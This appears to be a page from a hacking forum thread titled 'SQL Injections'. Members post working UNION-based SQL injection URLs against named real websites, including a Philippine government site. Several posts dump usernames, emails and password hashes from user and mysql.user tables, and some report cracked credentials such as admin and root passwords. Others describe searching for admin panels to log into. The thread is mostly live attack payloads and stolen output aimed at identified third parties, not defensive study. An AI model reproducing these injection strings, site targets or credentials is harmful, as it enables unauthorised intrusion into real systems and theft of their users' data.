SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. kamaz

    kamaz Elder

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    +1 - version 5.
    Data output:

    Code:
    http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat(nickname,char(58),email,char(58),passwd),3%20from%20forum_users/*
    Code:
    http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat(user_login,char(58),user_email,char(58),user_pass),3%20from%20users_ru/*
    Code:
    http://www.oppozicia.com/index.php?lang=1&part_id=39&year_id=2007&month_id=-01+union+select+1,concat_ws(char(58),absnum,level,position,name,alias,approved,description),3%20from%20admins/*
     
    2 people like this.
  2. Joker-jar

    Joker-jar Elder

    Joined:
    11 Mar 2007
    Messages:
    581
    Likes Received:
    205
    Reputations:
    37
    Sorry, I had a brain fade. Happens to everyone, right? :)
     
  3. n1†R0x

    n1†R0x Elder

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://mp3-portal.p8.ru/showlyric.php?id=-1'+union+select+1,2,convert(concat(user,0x3a,password)+using+cp1251),4,5,6,7+from+mysql.user/*&char=193
    mysql-5 hashes, version 4.1* =)
     
  4. lol2006

    lol2006 Elder

    Joined:
    25 May 2006
    Messages:
    75
    Likes Received:
    16
    Reputations:
    0
    Here
    Code:
    http://www.referats.info/worx.php?pnum=42+union+select+1,2,3,4/*
    Looks like 4, but I never figured out what to do next (I'm a newbie)! Maybe someone will continue)!
     
  5. dadunnnt

    dadunnnt New Member

    Joined:
    16 Feb 2006
    Messages:
    21
    Likes Received:
    4
    Reputations:
    3

    USER() : rossorig_superus@localhost
    VERSION() : 4.0.27-log
    DATABASE() : rossorig_agbook1
     
    2 people like this.
  6. Gorn

    Gorn Member

    Joined:
    25 Oct 2006
    Messages:
    13
    Likes Received:
    8
    Reputations:
    2
    Here, I googled a bit:
    Code:
    http://www.tectonic.co.za/view.php?id=99999999+union+select+1,concat(char(39,60,104,51,62,39),username,0x3a,password,0x3a,email),3,4+from+users
    http://intercar.com.ua/index.php?id=-1+union+select+1,2,3,4,5,6+from+users
    http://pressa.univ.kiev.ua/news.php?id=-1+union+select+1,2,3,4
    http://www.climb.com.ua/aboutbook.php?id=-1+union+select+1,2,3,4,5,6
    I can't find the admin panel here. There is a cpanel, but it doesn't work for it =\
    Code:
    http://www.a2k.org.ua/news.php?id=-1+union+select+1,2,3,4,concat(user,0x3a,password,0x3a,email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users&lng=ua
    user: admin
    pass: repz
    
    If any of this was already posted, sorry for the repost :)
     
    #2206 Gorn, 16 May 2007
    Last edited: 16 May 2007
    1 person likes this.
  7. sob@ke

    sob@ke Banned

    Joined:
    30 Dec 2006
    Messages:
    35
    Likes Received:
    9
    Reputations:
    -1
    http://www.dancenter.ru/articals.php?id=30'
     
    #2207 sob@ke, 16 May 2007
    Last edited: 16 May 2007
  8. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    sql-inj

    www.razvod.ru (4)
    phpbb_users (username, user_password, etc.)
    P.S. sob@ke
    already posted
     
  9. Muhacir

    Muhacir Elder

    Joined:
    5 Oct 2006
    Messages:
    91
    Likes Received:
    51
    Reputations:
    -2
    Code:
    http://www.minton.com.tr/html/urun.asp?urun=456465+union+select
    There's this Turkish company called Minton, heh. I couldn't guess the table :(
     
  10. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.bonus.ru/video/index.phtml?film_id=999999999+union+select+1,2,convert(concat(database(),char(58),user(),char(58),version()),char),4,5,6,7,8,9,10,11/*
    -------------

    Code:
    http://film.topd.ru/details.php?Id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(database(),char(58),user(),char(58),version()),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
    -------------

    Code:
    http://www.studentport.su/referat/cardinfo.php?id_card=-1+union+select+1,2,convert(concat(database(),char(58),user(),char(58),version()),char),4,5,6,7,8,9,10,11,12/*
    http://www.studentport.su/referat/cardinfo.php?id_card=-1+union+select+1,2,convert(concat(user,char(58),password),char),4,5,6,7,8,9,10,11,12+from+mysql.user/*
    -------------

    Code:
    http://www.natc.ru/clubs/forsazh/paper/?view=true&id=-1+union+select+1,2,3,4,5,6,7,8,concat(database(),char(58),user(),char(58),version()),10,11,12,13,14/*
    -------------

    Code:
    http://teo.poliglos.info/main.php?id='+union+select+concat(database(),char(58),user(),char(58),version())/*
    I didn't find any interesting tables:

    Code:
    http://teo.poliglos.info/main.php?id='+union+select+table_name+from+information_schema.tables+limit+45,1/*
     
  11. -=lebed=-

    -=lebed=- hash cracker

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Code:
    http://www.apahelpcenter.org/articles/article.php?id=-123+union+select+1,version(),user(),4,5/*
    
    P.S. I only used the anti-repost check just now... the SQL injection is a repost. :mad:
     
    #2211 -=lebed=-, 16 May 2007
    Last edited: 17 May 2007
    1 person likes this.
  12. pento

    pento Elder

    Joined:
    3 Jul 2006
    Messages:
    126
    Likes Received:
    24
    Reputations:
    -1
    Department of Social Welfare and Development
    DSWD Bldg., Constitution Hills, Batasan Complex, Q.C., Philippines
    Code:
    http://www.dswd.gov.ph/faqdetails.php?id=-1 union select 1,concat(user,CHAR(64),host,CHAR(58), password),3,4,5,6 from mysql.user/*
    
     
  13. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    antigreen.ru
     
    1 person likes this.
  14. jmp_$-3

    jmp_$-3 New Member

    Joined:
    27 Mar 2006
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    ХЭttp://tik.ru/pages/search.php?search=%27

    Code:
    TABLE_NAME:
    tik_pages
    tik_users
    Code:
    TABLE_STRUCT (tik_users):
    1, 2, 3, pass, login, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18
    An interesting toy :)
    There are multiple holes in various scripts, including cross-site scripting and injections.
     
  15. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    sql-inj

    Коррозия Металла

    http://www.korroziametalla.com/
    vulnerability: http://www.korroziametalla.com/news_arh.php?year=2007&id=49'
    -> mysql 5
    we view the tables using the standard means of version 5:
    we find kor_forum and kor_admin and take note of them. We view the columns the same way, then look inside them and see a login/password; the password is unencrypted
    admin panel
     
    #2215 Серенький, 16 May 2007
    Last edited: 16 May 2007
    4 people like this.
  16. Muhacir

    Muhacir Elder

    Joined:
    5 Oct 2006
    Messages:
    91
    Likes Received:
    51
    Reputations:
    -2

    root@localhost:299ce3c1618fe6e4

    pass:zaq12345
     
  17. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.dubovoe.ru/print.php?news_id=-1+union+select+1,2,3,4,5,6,concat(database(),char(58),user(),char(58),version()),8,9,10,11,12,13,14,15/*
    Code:
    http://campus4.best-host.ru/index.php?news=-1+union+select+1,2,3,4,5/*
     
  18. VampiRUS

    VampiRUS Elder

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    I couldn't find the admin panel(, the hashes are md5 truncated to 30 characters, the first 6 people have the same password, 123 (if only I knew where to plug it in :) ), I didn't look any further
     
    1 person likes this.
  19. p-range

    p-range Elder

    Joined:
    5 Feb 2006
    Messages:
    137
    Likes Received:
    145
    Reputations:
    118
    *BRAVO* :D

    nice :)

    P.S. I didn't dig any further. There are a lot of users there :) mysql.user is closed off.
     
    #2219 p-range, 17 May 2007
    Last edited: 17 May 2007
    1 person likes this.
  20. ЛифчиС5СВ

    ЛифчиС5СВ Elder

    Joined:
    9 Mar 2007
    Messages:
    164
    Likes Received:
    141
    Reputations:
    12
    http://doska.911.by
    Code:
    http://doska.911.by/full_info.php?sid=-1+union+select+1/*
     
    1 person likes this.